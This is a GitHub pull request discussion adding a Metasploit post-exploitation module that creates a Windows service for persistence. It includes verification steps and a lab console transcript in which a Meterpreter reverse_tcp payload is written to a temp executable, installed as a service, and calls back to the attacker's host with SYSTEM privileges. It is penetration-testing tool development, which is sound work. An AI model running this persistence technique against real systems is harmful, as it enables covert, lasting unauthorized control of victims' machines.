Add exploit module windows persistent service

[jrobles-r7]

Github was showing #10822 as 200+ commits and 100+ files changed. Opening in new PR so it is shown correctly.

Note: This PR rely on #10821, please merge that before merge this. Could be merged now.

resolved #10385

Verification steps

• get session on target
• use post/windows/manage/persistence_service
• set payload <payload>
• set lport <lport>
• set lhost <lhost>
• set handler true
• run

Usage

msf5 post(windows/manage/persistence_service) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: test-PC\test
meterpreter > sysinfo
Computer        : TEST-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background
[*] Backgrounding session 1...
msf5 post(windows/manage/persistence_service) > options

Module options (post/windows/manage/persistence_service):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   HANDLER  true                             no        Start an exploit/multi/handler to receive the connection
   LHOST    192.168.56.1                     yes       IP of host that will receive the connection from the payload.
   LPORT    4433                             no        Port for Payload to connect to.
   OPTIONS                                   no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        The payload to use in the service.
   SESSION  1                                yes       The session to run this module on.
msf5 post(windows/manage/persistence_service) > run

[*] Running module against TEST-PC
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.56.1:4433
[+] Meterpreter service exe written to C:\Users\test\AppData\Local\Temp\IDJkb.exe
[*] Creating service pWbPkeDm
[*] Cleanup Meterpreter RC File: /Users/green/.msf4/logs/persistence/TEST-PC_20181017.3740/TEST-PC_20181017.3740.rc
[*] Post module execution completed
[*] Sending stage (179779 bytes) to 192.168.56.101
msf5 post(windows/manage/persistence_service) > [*] Meterpreter session 3 opened (192.168.56.1:4433 -> 192.168.56.101:50101) at 2018-10-17 18:37:51 +0800
msf5 post(windows/manage/persistence_service) > sessions

Active sessions
===============

  Id  Name  Type                     Information                    Connection
  --  ----  ----                     -----------                    ----------
  1         meterpreter x86/windows  test-PC\test @ TEST-PC         192.168.56.1:8888 -> 192.168.56.101:50098 (192.168.56.101)
  3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ TEST-PC  192.168.56.1:4433 -> 192.168.56.101:50101 (192.168.56.101)

msf5 post(windows/manage/persistence_service) >

Enjoy it!

[Green-m]

Should be only valid for msf5 on account of the metasm compiler feature.

[jrobles-r7]

Some changes are needed to handle paths with spaces.
In the C code, the logic for checking the install/start service can be changed for comparing against the last provided argument, argv[argc-1]. Using the last argument will let us keep the strtok logic that is currently in the code and let us handle paths with spaces.

[jrobles-r7]

Release Notes

The exploit/windows/local/persistence_service module can be used to create a Windows service for persistence.

[jrobles-r7]

Thanks @Green-m !

[Green-m]

Thank you for landing this @shellfail

On Mon, Dec 17, 2018 at 23:18 @shellfail ***@***.***> wrote: Thanks @Green-m <https://github.com/Green-m> ! — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <#11123 (comment)>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AVfdHu7tIkSeQIDsemzTAlLACQDAa1bDks5u57WxgaJpZM4ZTxT6> .

-- Green-m